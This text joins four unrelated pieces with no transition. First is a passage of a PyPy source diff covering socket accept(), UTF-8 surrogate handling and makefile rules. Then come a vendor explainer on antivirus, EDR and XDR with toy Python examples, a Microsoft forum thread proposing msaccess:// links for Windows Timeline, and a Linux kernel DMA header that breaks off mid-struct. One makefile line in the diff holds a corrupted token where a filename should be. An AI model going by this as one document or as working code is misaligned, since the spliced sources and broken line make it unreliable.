return addr, addr.addr_p, addrlen_p
- def accept(self, SocketClass=None):
+ def accept(self):
"""Wait for an incoming connection.
- Return (new socket object, client address)."""
- if SocketClass is None:
- SocketClass = RSocket
+ Return (new socket fd, client address)."""
if self._select(False) == 1:
raise SocketTimeout
address, addr_p, addrlen_p = self._addrbuf()
if _c.invalid_socket(newfd):
raise self.error_handler()
address.addrlen = rffi.cast(lltype.Signed, addrlen)
- sock = make_socket(newfd, self.family, self.type, self.proto,
- SocketClass)
- return (sock, address)
+ return (newfd, address)
def bind(self, address):
"""Bind the socket to a local address."""
if res != 0:
raise self.error_handler()
+ def detach(self):
+ fd = self.fd
+ self.fd = _c.INVALID_SOCKET
+ return fd
+
if _c.WIN32:
def _connect(self, address):
"""Connect the socket to a remote address."""
File pypy/rlib/runicode.py
]
def str_decode_utf_8(s, size, errors, final=False,
- errorhandler=None):
+ errorhandler=None, allow_surrogates=False):
if errorhandler is None:
errorhandler = raise_unicode_exception_decode
- return str_decode_utf_8_impl(s, size, errors, final, errorhandler)
+ return str_decode_utf_8_impl(s, size, errors, final, errorhandler,
+ allow_surrogates=allow_surrogates)
-def str_decode_utf_8_impl(s, size, errors, final, errorhandler):
+def str_decode_utf_8_impl(s, size, errors, final, errorhandler,
+ allow_surrogates):
if size == 0:
return u'', 0
if (ordch2>>6 != 0x2 or # 0b10
(ordch1 == 0xe0 and ordch2 < 0xa0)
# surrogates shouldn't be valid UTF-8!
- # Uncomment the line below to make them invalid.
- # or (ordch1 == 0xed and ordch2 > 0x9f)
+ or (not allow_surrogates and ordch1 == 0xed and ordch2 > 0x9f)
):
r, pos = errorhandler(errors, 'utf-8',
'invalid continuation byte',
result.append((chr((0x80 | ((ch >> 6) & 0x3f)))))
result.append((chr((0x80 | (ch & 0x3f)))))
-def unicode_encode_utf_8(s, size, errors, errorhandler=None):
+def unicode_encode_utf_8(s, size, errors, errorhandler=None,
+ allow_surrogates=False):
+ if errorhandler is None:
+ errorhandler = raise_unicode_exception_encode
+ return unicode_encode_utf_8_impl(s, size, errors, errorhandler,
+ allow_surrogates=allow_surrogates)
+
+def unicode_encode_utf_8_impl(s, size, errors, errorhandler,
+ allow_surrogates=False):
assert(size >= 0)
result = StringBuilder(size)
- i = 0
- while i < size:
- ch = ord(s[i])
- i += 1
+ pos = 0
+ while pos < size:
+ ch = ord(s[pos])
+ pos += 1
if ch < 0x80:
# Encode ASCII
result.append(chr(ch))
# Encode UCS2 Unicode ordinals
if ch < 0x10000:
# Special case: check for high surrogate
- if 0xD800 <= ch <= 0xDBFF and i != size:
- ch2 = ord(s[i])
- # Check for low surrogate and combine the two to
- # form a UCS4 value
- if 0xDC00 <= ch2 <= 0xDFFF:
- ch3 = ((ch - 0xD800) << 10 | (ch2 - 0xDC00)) + 0x10000
- i += 1
- _encodeUCS4(result, ch3)
+ if 0xD800 <= ch <= 0xDFFF:
+ if pos != size:
+ ch2 = ord(s[pos])
+ # Check for low surrogate and combine the two to
+ # form a UCS4 value
+ if ch <= 0xDBFF and 0xDC00 <= ch2 <= 0xDFFF:
+ ch3 = ((ch - 0xD800) << 10 | (ch2 - 0xDC00)) + 0x10000
+ pos += 1
+ _encodeUCS4(result, ch3)
+ continue
+ if not allow_surrogates:
+ r, pos = errorhandler(errors, 'utf-8',
+ 'surrogates not allowed',
+ s, pos-1, pos)
+ for ch in r:
+ if ord(ch) < 0x80:
+ result.append(chr(ord(ch)))
+ else:
+ errorhandler('strict', 'utf-8',
+ 'surrogates not allowed',
+ s, pos-1, pos)
continue
- # Fall through: handles isolated high surrogates
+ # else: Fall through and handles isolated high surrogates
result.append((chr((0xe0 | (ch >> 12)))))
result.append((chr((0x80 | ((ch >> 6) & 0x3f)))))
result.append((chr((0x80 | (ch & 0x3f)))))
- continue
else:
_encodeUCS4(result, ch)
return result.build()
return builder.build(), pos
-def unicode_encode_unicode_escape(s, size, errors, errorhandler=None, quotes=False):
- # errorhandler is not used: this function cannot cause Unicode errors
- result = StringBuilder(size)
+def make_unicode_escape_function(pass_printable=False, unicode_output=False,
+ quotes=False, prefix=None):
+ # Python3 has two similar escape functions: One to implement
+ # encode('unicode_escape') and which outputs bytes, and unicode.__repr__
+ # which outputs unicode. They cannot share RPython code, so we generate
+ # them with the template below.
+ # Python2 does not really need this, but it reduces diffs between branches.
- if quotes:
- if s.find(u'\'') != -1 and s.find(u'\"') == -1:
- quote = ord('\"')
- result.append('u"')
+ if unicode_output:
+ STRING_BUILDER = UnicodeBuilder
+ STR = unicode
+ CHR = UNICHR
+ else:
+ STRING_BUILDER = StringBuilder
+ STR = str
+ CHR = chr
+
+ def unicode_escape(s, size, errors, errorhandler=None):
+ # errorhandler is not used: this function cannot cause Unicode errors
+ result = STRING_BUILDER(size)
+
+ if quotes:
+ if prefix:
+ result.append(STR(prefix))
+ if s.find(u'\'') != -1 and s.find(u'\"') == -1:
+ quote = ord('\"')
+ result.append(STR('"'))
+ else:
+ quote = ord('\'')
+ result.append(STR('\''))
else:
- quote = ord('\'')
- result.append('u\'')
- else:
- quote = 0
+ quote = 0
- if size == 0:
- return ''
+ if size == 0:
+ return STR('')
- pos = 0
- while pos < size:
- ch = s[pos]
- oc = ord(ch)
+ pos = 0
+ while pos < size:
+ ch = s[pos]
+ oc = ord(ch)
- # Escape quotes
- if quotes and (oc == quote or ch == '\\'):
- result.append('\\')
- result.append(chr(oc))
- pos += 1
- continue
-
- # The following logic is enabled only if MAXUNICODE == 0xffff, or
- # for testing on top of a host CPython where sys.maxunicode == 0xffff
- if ((MAXUNICODE < 65536 or
- (not we_are_translated() and sys.maxunicode < 65536))
- and 0xD800 <= oc < 0xDC00 and pos + 1 < size):
- # Map UTF-16 surrogate pairs to Unicode \UXXXXXXXX escapes
- pos += 1
- oc2 = ord(s[pos])
-
- if 0xDC00 <= oc2 <= 0xDFFF:
- ucs = (((oc & 0x03FF) << 10) | (oc2 & 0x03FF)) + 0x00010000
- raw_unicode_escape_helper(result, ucs)
+ # Escape quotes
+ if quotes and (oc == quote or ch == '\\'):
+ result.append(STR('\\'))
+ result.append(CHR(oc))
pos += 1
continue
- # Fall through: isolated surrogates are copied as-is
- pos -= 1
- # Map special whitespace to '\t', \n', '\r'
- if ch == '\t':
- result.append('\\t')
- elif ch == '\n':
- result.append('\\n')
- elif ch == '\r':
- result.append('\\r')
- elif ch == '\\':
- result.append('\\\\')
+ # The following logic is enabled only if MAXUNICODE == 0xffff, or
+ # for testing on top of a host Python where sys.maxunicode == 0xffff
+ if ((MAXUNICODE < 65536 or
+ (not we_are_translated() and sys.maxunicode < 65536))
+ and 0xD800 <= oc < 0xDC00 and pos + 1 < size):
+ # Map UTF-16 surrogate pairs to Unicode \UXXXXXXXX escapes
+ pos += 1
+ oc2 = ord(s[pos])
- # Map non-printable or non-ascii to '\xhh' or '\uhhhh'
- elif oc < 32 or oc >= 0x7F:
- raw_unicode_escape_helper(result, oc)
+ if 0xDC00 <= oc2 <= 0xDFFF:
+ ucs = (((oc & 0x03FF) << 10) | (oc2 & 0x03FF)) + 0x00010000
+ char_escape_helper(result, ucs)
+ pos += 1
+ continue
+ # Fall through: isolated surrogates are copied as-is
+ pos -= 1
- # Copy everything else as-is
+ # Map special whitespace to '\t', \n', '\r'
+ if ch == '\t':
+ result.append(STR('\\t'))
+ elif ch == '\n':
+ result.append(STR('\\n'))
+ elif ch == '\r':
+ result.append(STR('\\r'))
+ elif ch == '\\':
+ result.append(STR('\\\\'))
+
+ # Map non-printable or non-ascii to '\xhh' or '\uhhhh'
+ elif pass_printable and not unicodedb.isprintable(oc):
+ char_escape_helper(result, oc)
+ elif not pass_printable and (oc < 32 or oc >= 0x7F):
+ char_escape_helper(result, oc)
+
+ # Copy everything else as-is
+ else:
+ result.append(CHR(oc))
+ pos += 1
+
+ if quotes:
+ result.append(CHR(quote))
+ return result.build()
+
+ def char_escape_helper(result, char):
+ num = hex(char)
+ if STR is unicode:
+ num = num.decode('ascii')
+ if char >= 0x10000:
+ result.append(STR("\\U"))
+ zeros = 8
+ elif char >= 0x100:
+ result.append(STR("\\u"))
+ zeros = 4
else:
- result.append(chr(oc))
- pos += 1
+ result.append(STR("\\x"))
+ zeros = 2
+ lnum = len(num)
+ nb = zeros + 2 - lnum # num starts with '0x'
+ if nb > 0:
+ result.append_multiple_char(STR('0'), nb)
+ result.append_slice(num, 2, lnum)
- if quotes:
- result.append(chr(quote))
- return result.build()
+ return unicode_escape, char_escape_helper
+
+# This function is also used by _codecs/interp_codecs.py
+(unicode_encode_unicode_escape, raw_unicode_escape_helper
+ ) = make_unicode_escape_function()
# ____________________________________________________________
# Raw unicode escape
return result.build(), pos
-def raw_unicode_escape_helper(result, char):
- num = hex(char)
- if char >= 0x10000:
- result.append("\\U")
- zeros = 8
- elif char >= 0x100:
- result.append("\\u")
- zeros = 4
- else:
- result.append("\\x")
- zeros = 2
- lnum = len(num)
- nb = zeros + 2 - lnum # num starts with '0x'
- if nb > 0:
- result.append_multiple_char('0', nb)
- result.append_slice(num, 2, lnum)
-
def unicode_encode_raw_unicode_escape(s, size, errors, errorhandler=None):
# errorhandler is not used: this function cannot cause Unicode errors
if size == 0:
File pypy/rlib/test/test_rpoll.py
assert events[0][0] == serv.fd
assert events[0][1] & POLLIN
- servconn, cliaddr = serv.accept()
+ servconn_fd, cliaddr = serv.accept()
+ servconn = RSocket(AF_INET, fd=servconn_fd)
events = poll({serv.fd: POLLIN,
cli.fd: POLLOUT}, timeout=500)
File pypy/rlib/test/test_rsocket.py
lock.acquire()
thread.start_new_thread(connecting, ())
print 'waiting for connection'
- s1, addr2 = sock.accept()
+ fd1, addr2 = sock.accept()
+ s1 = RSocket(fd=fd1)
print 'connection accepted'
lock.acquire()
print 'connecting side knows that the connection was accepted too'
if errcodesok:
assert err.value.errno in (errno.EINPROGRESS, errno.EWOULDBLOCK)
- s1, addr2 = sock.accept()
+ fd1, addr2 = sock.accept()
+ s1 = RSocket(fd=fd1)
s1.setblocking(False)
assert addr.eq(s2.getpeername())
assert addr2.get_port() == s2.getsockname().get_port()
clientsock = RSocket(AF_UNIX)
clientsock.connect(a)
- s, addr = serversock.accept()
+ fd, addr = serversock.accept()
+ s = RSocket(AF_UNIX, fd=fd)
s.send('X')
data = clientsock.recv(100)
File pypy/rlib/test/test_runicode.py
for i in range(10000):
for encoding in ("utf-7 utf-8 utf-16 utf-16-be utf-16-le "
"utf-32 utf-32-be utf-32-le").split():
+ if encoding == 'utf-8' and 0xd800 <= i <= 0xdfff:
+ # Don't try to encode lone surrogates
+ continue
self.checkdecode(unichr(i), encoding)
def test_random(self):
self.checkdecode(s, "utf-8")
def test_utf8_surrogate(self):
- # A surrogate should not be valid utf-8, but python 2.x accepts them.
- # This test will raise an error with python 3.x
- self.checkdecode(u"\ud800", "utf-8")
+ # surrogates used to be allowed by python 2.x
+ raises(UnicodeDecodeError, self.checkdecode, u"\ud800", "utf-8")
def test_invalid_start_byte(self):
"""
self.checkencode(s, "utf-8")
def test_utf8_surrogates(self):
- # check replacing of two surrogates by single char while encoding
# make sure that the string itself is not marshalled
u = u"\ud800"
for i in range(4):
u += u"\udc00"
- self.checkencode(u, "utf-8")
+ if runicode.MAXUNICODE < 65536:
+ # Check replacing of two surrogates by single char while encoding
+ self.checkencode(u, "utf-8")
+ else:
+ # This is not done in wide unicode builds
+ raises(UnicodeEncodeError, self.checkencode, u, "utf-8")
def test_ascii_error(self):
self.checkencodeerror(u"abc\xFF\xFF\xFFcde", "ascii", 3, 6)
File pypy/rpython/rstr.py
from pypy.rpython.annlowlevel import hlstr
value = hlstr(llvalue)
assert value is not None
- univalue, _ = self.rstr_decode_utf_8(value, len(value), 'strict',
- False, self.ll_raise_unicode_exception_decode)
+ univalue, _ = self.rstr_decode_utf_8(
+ value, len(value), 'strict', final=False,
+ errorhandler=self.ll_raise_unicode_exception_decode,
+ allow_surrogates=False)
return self.ll.llunicode(univalue)
def ll_raise_unicode_exception_decode(self, errors, encoding, msg, s,
self.runicode_encode_utf_8 = None
def ensure_ll_encode_utf8(self):
- from pypy.rlib.runicode import unicode_encode_utf_8
- self.runicode_encode_utf_8 = func_with_new_name(unicode_encode_utf_8,
- 'runicode_encode_utf_8')
+ from pypy.rlib.runicode import unicode_encode_utf_8_impl
+ self.runicode_encode_utf_8 = func_with_new_name(
+ unicode_encode_utf_8_impl, 'runicode_encode_utf_8')
def rtype_method_upper(self, hop):
raise TypeError("Cannot do toupper on unicode string")
from pypy.rpython.annlowlevel import hlunicode
s = hlunicode(ll_s)
assert s is not None
- bytes = self.runicode_encode_utf_8(s, len(s), 'strict')
+ bytes = self.runicode_encode_utf_8(
+ s, len(s), 'strict',
+ errorhandler=self.ll_raise_unicode_exception_decode,
+ allow_surrogates=False)
return self.ll.llstr(bytes)
+ def ll_raise_unicode_exception_encode(self, errors, encoding, msg, u,
+ startingpos, endingpos):
+ raise UnicodeEncodeError(encoding, u, startingpos, endingpos, msg)
+
class __extend__(annmodel.SomeString):
def rtyper_makerepr(self, rtyper):
return rtyper.type_system.rstr.string_repr
File pypy/translator/c/genc.py
def get_recent_cpython_executable():
if sys.platform == 'win32':
- python = sys.executable.replace('\\', '/') + ' '
+ python = sys.executable.replace('\\', '/')
else:
- python = sys.executable + ' '
-
+ python = sys.executable
# Is there a command 'python' that runs python 2.5-2.7?
# If there is, then we can use it instead of sys.executable
returncode, stdout, stderr = runsubprocess.run_subprocess(
"python", "-V")
if _CPYTHON_RE.match(stdout) or _CPYTHON_RE.match(stderr):
- python = 'python '
+ python = 'python'
return python
for rule in rules:
mk.rule(*rule)
+ #XXX: this conditional part is not tested at all
if self.config.translation.gcrootfinder == 'asmgcc':
trackgcfiles = [cfile[:cfile.rfind('.')] for cfile in mk.cfiles]
if self.translator.platform.name == 'msvc':
else:
mk.definition('PYPY_MAIN_FUNCTION', "main")
- python = get_recent_cpython_executable()
+ mk.definition('PYTHON', get_recent_cpython_executable())
if self.translator.platform.name == 'msvc':
lblofiles = []
'cmd /c $(MASM) /nologo /Cx /Cp /Zm /coff /Fo$@ /c $< $(INCLUDEDIRS)')
mk.rule('.c.gcmap', '',
['$(CC) /nologo $(ASM_CFLAGS) /c /FAs /Fa$*.s $< $(INCLUDEDIRS)',
- 'cmd /c ' + python + '$(PYPYDIR)/translator/c/gcc/trackgcroot.py -fmsvc -t $*.s > $@']
+ 'cmd /c $(PYTHON) $(PYPYDIR)/translator/c/gcc/trackgcroot.py -fmsvc -t $*.s > $@']
)
mk.rule('gcmaptable.c', '$(GCMAPFILES)',
- 'cmd /c ' + python + '$(PYPYDIR)/translator/c/gcc/trackgcroot.py -fmsvc $(GCMAPFILES) > $@')
+ 'cmd /c $(PYTHON) $(PYPYDIR)/translator/c/gcc/trackgcroot.py -fmsvc $(GCMAPFILES) > $@')
else:
mk.definition('OBJECTS', '$(ASMLBLFILES) gcmaptable.s')
mk.rule('%.s', '%.c', '$(CC) $(CFLAGS) $(CFLAGSEXTRA) -frandom-seed=$< -o $@ -S $< $(INCLUDEDIRS)')
mk.rule('%.lbl.s %.gcmap', '%.s',
- [python +
- '$(PYPYDIR)/translator/c/gcc/trackgcroot.py '
+ [
+ '$(PYTHON) $(PYPYDIR)/translator/c/gcc/trackgcroot.py '
'-t $< > $*.gctmp',
'mv $*.gctmp $*.gcmap'])
mk.rule('gcmaptable.s', '$(GCMAPFILES)',
- [python +
- '$(PYPYDIR)/translator/c/gcc/trackgcroot.py '
+ [
+ '$(PYTHON) $(PYPYDIR)/translator/c/gcc/trackgcroot.py '
'$(GCMAPFILES) > [email protected]',
'mv [email protected] $@'])
mk.rule('.PRECIOUS', '%.s', "# don't remove .s files if Ctrl-C'ed")
Understanding Antivirus, EDR, and XDR: A Comprehensive Guide to Cybersecurity Solutions
There has never been a more critical time to understand cybersecurity solutions like Antivirus, Endpoint Detection and Response (EDR), and Extended Detection and Response (XDR). With increasingly sophisticated cyber threats emerging every day, these tools are essential lines of defense in protecting sensitive information and maintaining safe, secure digital infrastructures.
Understanding Antivirus Software
The first line of defense in any cybersecurity strategy is usually antivirus software. With its roots in detecting and eliminating computer viruses, antivirus software has evolved substantially to confront a wide range of malicious code, including Trojans, ransomware, and spyware.
Antivirus software works by identifying unique signatures of known malware and blocking or removing them from your system. However, the rapid evolution of cyber threats necessitates additional layers of security that go beyond traditional signature-based detection. This necessity leads us to more advanced solutions like EDR and XDR.
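As a rough, toy illustration of the idea (not any vendor's actual engine — the payload and detection name below are invented), signature-based scanning boils down to matching a file's fingerprint against a database of known-bad fingerprints:

```python
import hashlib

def signature_of(data):
    # A "signature" here is simply a SHA-256 digest of the file contents.
    return hashlib.sha256(data).hexdigest()

# Hypothetical signature database mapping digests to malware family names.
SIGNATURE_DB = {
    signature_of(b"malicious-payload-example"): "Trojan.Example",
}

def scan(data):
    """Return a detection name if the file matches a known signature, else None."""
    return SIGNATURE_DB.get(signature_of(data))

print(scan(b"malicious-payload-example"))  # -> Trojan.Example
print(scan(b"harmless file"))              # -> None
```

The weakness the article describes is visible here: flip a single byte of the payload and the digest no longer matches, so the scanner sees nothing.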
Comprehending Endpoint Detection and Response (EDR)
EDR solutions provide real-time monitoring and response capabilities to potential threats at the device or endpoint level. EDR systems go beyond traditional signature-based detection by employing behavioral analytics to identify anomalies and deviations that could indicate a security breach.
Without getting too technical, EDR collects and stores endpoint data, continuously monitoring for potentially harmful activity. If detected, the EDR system runs predetermined responses—from isolating the affected machines to engaging incident management processes, thereby providing real-time threat mitigation.
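A minimal sketch of that detect-then-respond loop might look like the following; the event shape, the behavioral rule, and the process names are invented for illustration and are not taken from any real EDR product:

```python
from dataclasses import dataclass

@dataclass
class EndpointEvent:
    host: str
    process: str
    action: str   # e.g. "spawn", "file_write", "network_connect"
    target: str

# Hypothetical behavioral rule: a word processor spawning a shell is suspicious.
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe"}

def is_anomalous(event):
    return (event.action == "spawn"
            and event.process == "winword.exe"
            and event.target in SUSPICIOUS_CHILDREN)

def respond(event, isolate_host):
    # Predetermined response: isolate the affected machine on detection.
    if is_anomalous(event):
        isolate_host(event.host)

isolated = []
respond(EndpointEvent("pc-42", "winword.exe", "spawn", "powershell.exe"),
        isolated.append)
print(isolated)  # -> ['pc-42']
```

Note that nothing here depends on a malware signature: the rule fires on behavior, which is exactly what distinguishes EDR from the static scanning above.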
While traditional antivirus software could be seen as a static guard, an EDR system is a dynamic detective—constantly investigating, learning from, and responding to changes in the network environment.
Diving Deeper: Extended Detection and Response (XDR)
XDR is essentially EDR on steroids. While EDR tends to focus on endpoint protection, XDR expands the security viewpoint across all network segments. This comprehensive solution allows for threat detection, analytics, and response across endpoints, networks, servers, and cloud providers.
XDR solutions centralize and automate these tasks; a major boon for organizations wrestling with multiple, uncoordinated security tools. This automation reduces errors, speeds up response times, and allows for faster remediation of threats across an entire IT infrastructure.
By aggregating data from across an organization's security infrastructure, XDR can use machine learning and AI to identify patterns and behaviors that could indicate a threat. This proactive approach can potentially prevent breaches before they occur, rather than simply responding once they have.
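To make the aggregation idea concrete, here is a toy correlation step — the alert format and source names are assumptions, not any real XDR schema — that flags a host only when independent telemetry sources agree:

```python
from collections import defaultdict

# Hypothetical normalized alerts from different telemetry sources.
alerts = [
    {"source": "endpoint", "host": "pc-42", "signal": "suspicious_process"},
    {"source": "network",  "host": "pc-42", "signal": "beaconing"},
    {"source": "cloud",    "host": "pc-07", "signal": "impossible_travel"},
]

def correlate(alerts, threshold=2):
    """Flag hosts reported by at least `threshold` distinct telemetry sources."""
    sources_by_host = defaultdict(set)
    for alert in alerts:
        sources_by_host[alert["host"]].add(alert["source"])
    return [host for host, sources in sources_by_host.items()
            if len(sources) >= threshold]

print(correlate(alerts))  # -> ['pc-42']
```

Each alert on its own might be noise; it is the cross-source view — the thing an uncoordinated pile of point tools lacks — that turns them into a high-confidence signal.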
The Importance of Implementation
It is important to note that simply investing in antivirus, EDR, or XDR solutions is not enough. Implementing these tools effectively requires a clear cybersecurity strategy, rigorous protocols, and employee training. Without these components, even the most advanced security solution can fail to protect an organization from cyber threats.
Additionally, organizations must also consider factors like the potential business impact of a security breach, regulatory requirements, and the cost of implementing and maintaining the selected security solution. It's a balancing act between operational continuity, regulatory compliance, and fiscal responsibility.
In conclusion
Antivirus, EDR, and XDR represent different tiers of cybersecurity solutions, with each step up bringing greater complexity and broader scope. The choice between them depends on an organization's specific needs, threat landscape, and resources. Ultimately, it's about understanding these tools and deploying them strategically to best protect your organizational assets in an increasingly perilous digital world.
John Price
Chief Executive Officer
October 6, 2023
Windows 10 April 2018 Update - New Timeline Feature is why I LOVE the new Microsoft
MVP
Today Microsoft announced all of the new features in the Windows 10 April update and one really caught my eye: Timeline. It pretty much allows you to backtrack and find the latest email or file you were working on. In the past I'd just open the program in question and look at its history, but with Timeline I can go straight to what I'm looking for right away.
How does it affect Microsoft Access?
We've been programming Timeline-like features into our programs for years now; it's a great way, for example, to find a customer you looked at in the past but whose name you can't quite remember. What if we could have the native OS track the records in question for us? We could look at our timeline, open the database, load the record and voilà, I'm in business.
I suspect the new feature would only work with files, but I'd love to see this go further; if it does it for URLs, why not records?
6 Replies
Thanks for the heads up, Juan!
I was wondering what the new Timeline feature being advertised during the update was.
I've never used Task View much myself, but it may be worth it now (vs. gesture mapping + Alt-Tab).
I like where you are going with this idea of allowing users to navigate back to previous records via Windows Timeline.
Maybe something that could help make support for Access records in Windows Timeline feasible (and without requiring as much Access-specific customization of Timeline) is having Microsoft Access provide general support for assigning URLs + query parameters to Forms in Access, together with an msaccess:// protocol handler.
Then we could navigate back to a particular form, report, query or other Access object, optionally with a specific record, built-in Filter/Sort state or other custom state parameters. This could make it possible to navigate to a specific view for a specific record, or just a form or report in general via Windows Timeline.
If Microsoft Access team provided support for an msaccess:// protocol, then that could also be used to provide generalized backwards/forwards (with form opening and filter/sort/focus change history) navigation. Then, even without requiring Windows team to buy into this idea, the Access team could deliver most of the benefit, in allowing backwards/forwards view state navigation. The Access team could even expose this state via a new Recent Records/Objects menu in File > Open > Recent dialog, a separate Records/Objects Timeline dialog, and/or Backwards/Forwards buttons (+ history drop-down) similar to Undo/Redo in Access or Forward/Backwards in Visual Studio.
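To make the link idea concrete, here is a rough sketch of how such a link could be decomposed into navigation state. To be clear, the msaccess:// scheme with these parameters is the hypothetical proposal being discussed, not a documented Microsoft feature, and the database/form/parameter names below are invented for illustration:

```python
from urllib.parse import urlparse, parse_qs

def parse_msaccess_link(link):
    """Split a hypothetical msaccess:// link into its navigation parts.

    Example shape (invented for illustration):
      msaccess://Northwind.accdb/frmCustomers?id=42&sort=LastName
    """
    parsed = urlparse(link)
    params = {k: v[0] for k, v in parse_qs(parsed.query).items()}
    return {
        "database": parsed.netloc,          # database file to locate
        "object": parsed.path.lstrip("/"),  # form/report/query to open
        "params": params,                   # record id, filter/sort state, ...
    }

link = "msaccess://Northwind.accdb/frmCustomers?id=42&sort=LastName"
print(parse_msaccess_link(link))
# {'database': 'Northwind.accdb', 'object': 'frmCustomers',
#  'params': {'id': '42', 'sort': 'LastName'}}
```

A registered protocol handler could resolve the database name against trusted search paths and then hand the object name and parameters to Access on launch.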
Ideally Access would make this possible without the same absolute file paths among users, such as with support for a series of known "search paths" for databases (eg. possibly even using paths defined at Access Options > Trust Center > Trusted Locations) and/or placeholder or environment variable (eg. {UserFolder}, {User/DefaultNetworkShareFolder}) which could be used to locate a database by name. Database path resolving could be quite useful in and of itself, for database references and other purposes.
Moreover, with the death of Access Web Apps, the ability to launch Access straight to a specific database, with a specific form, report or record, from, for example, SharePoint, PowerApps, Power BI or a link on a web page or in an email would IMO go a long way towards making Access databases more web-friendly/integrated and feasible to use in more cases where one would otherwise have ended up building an Access Web App, back before they were deprecated.
Especially considering that, for some reason, PowerApps (despite often being pushed as the "Access Web Apps replacement") still can't use an Access database as a data source, even though Power BI supports it via the same shared On-Premises Gateway, this would be a big boon, in my opinion, to encouraging more Access use in the face of frequent web/cloud migrations.
On that note, does anyone know why PowerApps still doesn't support use of Access Databases as a data source, despite sharing the same On-Premises Gateway which enables Power BI to connect to Access databases?
Any chance we could get this finally supported? Or is there anyone with some clout with the PowerApps or Access team who could help make that possible?
Just creating or voting for a feature request on User Voice seems unlikely to make that happen if it hasn't happened already.
It seems counter-intuitive IMO that something marketed as an "Access Web Apps" replacement like PowerApps (and which presumably justifies no longer needing Access Web Apps to be supported) wouldn't even allow connections to Access databases.
That is, unless doing so is a conscious part of what seemed to be Microsoft's earlier push to encourage migrating away from Access (e.g. the initial attempt to remove it from most Office subscriptions/editions until user backlash saw it added to more editions instead).
I know that using an Access database as a back-end isn't as reliable or high-performance as SQL Server or Azure SQL as a back-end, but it seems like a step up in many cases compared to just using an Excel workbook as a back-end (via On-Premises Gateway or OneDrive), which is a primary use case for PowerApps.
Providing support for Access databases in PowerApps would IMO go a long way towards increasing PowerApps adoption and likely use cases, as well as encouraging more users to stick with easily-editable Access databases vs. porting to Common Data Service (not always so intuitive) or SQL Server (not easy for end users or subject-matter experts like financial analysts to modify and maintain without IT or consultant involvement).
I totally upvote this one
@DanMoorehead_PowerWeb5AI wrote:
On that note, does anyone know why PowerApps still doesn't support use of Access Databases as a data source, despite sharing the same On-Premises Gateway which enables Power BI to connect to Access databases?
It is a major concern not to have clear indications on major features like that in a roadmap for 2019.
I agree. I'd very much like to have an idea of if/when we may end up seeing PowerApps support for connections to Access databases, which are already supported via the same shared On-Premises Gateway, but only for Power BI.
Can anyone on the Access, PowerApps or Power BI team answer that one, or anyone else familiar with the reason for the current limitation?
Though there already is an ms-access:// protocol, I would suggest having such links behave as described in the previous post, and enabling their use even from internet security zone websites by default (which currently isn't the case) in order to maximize the feasibility of using Access with otherwise web-based use cases.
Does anyone have links to documentation regarding the format and behavior of ms-access:// protocol links or can otherwise detail this?
Linux kernel & device driver programming
Cross-Referenced Linux and Device Driver Code
[ source navigation ] [ diff markup ] [ identifier search ] [ freetext search ] [ file search ]
Version: [ 2.6.11.8 ] [ 2.6.25 ] [ 2.6.25.8 ] [ 2.6.31.13 ] Architecture: [ i386 ]
1 /*
2 * Copyright(c) 2006, Intel Corporation.
3 *
4 * This program is free software; you can redistribute it and/or modify it
5 * under the terms and conditions of the GNU General Public License,
6 * version 2, as published by the Free Software Foundation.
7 *
8 * This program is distributed in the hope it will be useful, but WITHOUT
9 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
10 * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
11 * more details.
12 *
13 * You should have received a copy of the GNU General Public License along with
14 * this program; if not, write to the Free Software Foundation, Inc.,
15 * 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
16 *
17 */
18 #ifndef _ADMA_H
19 #define _ADMA_H
20 #include <linux/types.h>
21 #include <linux/io.h>
22 #include <asm/hardware.h>
23 #include <asm/hardware/iop_adma.h>
24
25 #define ADMA_ACCR(chan) (chan->mmr_base + 0x0)
26 #define ADMA_ACSR(chan) (chan->mmr_base + 0x4)
27 #define ADMA_ADAR(chan) (chan->mmr_base + 0x8)
28 #define ADMA_IIPCR(chan) (chan->mmr_base + 0x18)
29 #define ADMA_IIPAR(chan) (chan->mmr_base + 0x1c)
30 #define ADMA_IIPUAR(chan) (chan->mmr_base + 0x20)
31 #define ADMA_ANDAR(chan) (chan->mmr_base + 0x24)
32 #define ADMA_ADCR(chan) (chan->mmr_base + 0x28)
33 #define ADMA_CARMD(chan) (chan->mmr_base + 0x2c)
34 #define ADMA_ABCR(chan) (chan->mmr_base + 0x30)
35 #define ADMA_DLADR(chan) (chan->mmr_base + 0x34)
36 #define ADMA_DUADR(chan) (chan->mmr_base + 0x38)
37 #define ADMA_SLAR(src, chan) (chan->mmr_base + (0x3c + (src << 3)))
38 #define ADMA_SUAR(src, chan) (chan->mmr_base + (0x40 + (src << 3)))
39
40 struct iop13xx_adma_src {
41 u32 src_addr;
42 union {
43 u32 upper_src_addr;
44 struct {
45 unsigned int pq_upper_src_addr:24;
46 unsigned int pq_dmlt:8;
47 };
48 };
49 };
50
51 struct iop13xx_adma_desc_ctrl {
52 unsigned int int_en:1;
53 unsigned int xfer_dir:2;
54 unsigned int src_select:4;
55 unsigned int zero_result:1;
56 unsigned int block_fill_en:1;
57 unsigned int crc_gen_en:1;
58 unsigned int crc_xfer_dis:1;
59 unsigned int crc_seed_fetch_dis:1;
60 unsigned int status_write_back_en:1;
61 unsigned int endian_swap_en:1;
62 unsigned int reserved0:2;
63 unsigned int pq_update_xfer_en:1;
64 unsigned int dual_xor_en:1;
65 unsigned int pq_xfer_en:1;
66 unsigned int p_xfer_dis:1;
67 unsigned int reserved1:10;
68 unsigned int relax_order_en:1;
69 unsigned int no_snoop_en:1;
70 };
71
72 struct iop13xx_adma_byte_count {
73 unsigned int byte_count:24;
74 unsigned int host_if:3;
75 unsigned int reserved:2;
76 unsigned int zero_result_err_q:1;
77 unsigned int zero_result_err:1;
78 unsigned int tx_complete:1;
79 };
80
81 struct iop13xx_adma_desc_hw {
82 u32 next_desc;
83 union {
84 u32 desc_ctrl;
85 struct iop13xx_adma_desc_ctrl desc_ctrl_field;
86 };
87 union {
88 u32 crc_addr;
89 u32 block_fill_data;
90 u32 q_dest_addr;
91 };
92 union {
93 u32 byte_count;
94 struct iop13xx_adma_byte_count byte_count_field;
95 };
96 union {
97 u32 dest_addr;
98 u32 p_dest_addr;
99 };
100 union {
101 u32 upper_dest_addr;
102 u32 pq_upper_dest_addr;
103 };
104 struct iop13xx_adma_src src[1];
105 };
106
107 struct iop13xx_adma_desc_dual_xor {
108 u32 next_desc;
109 u32 desc_ctrl;
110 u32 reserved;
111 u32 byte_count;
112 u32 h_dest_addr;
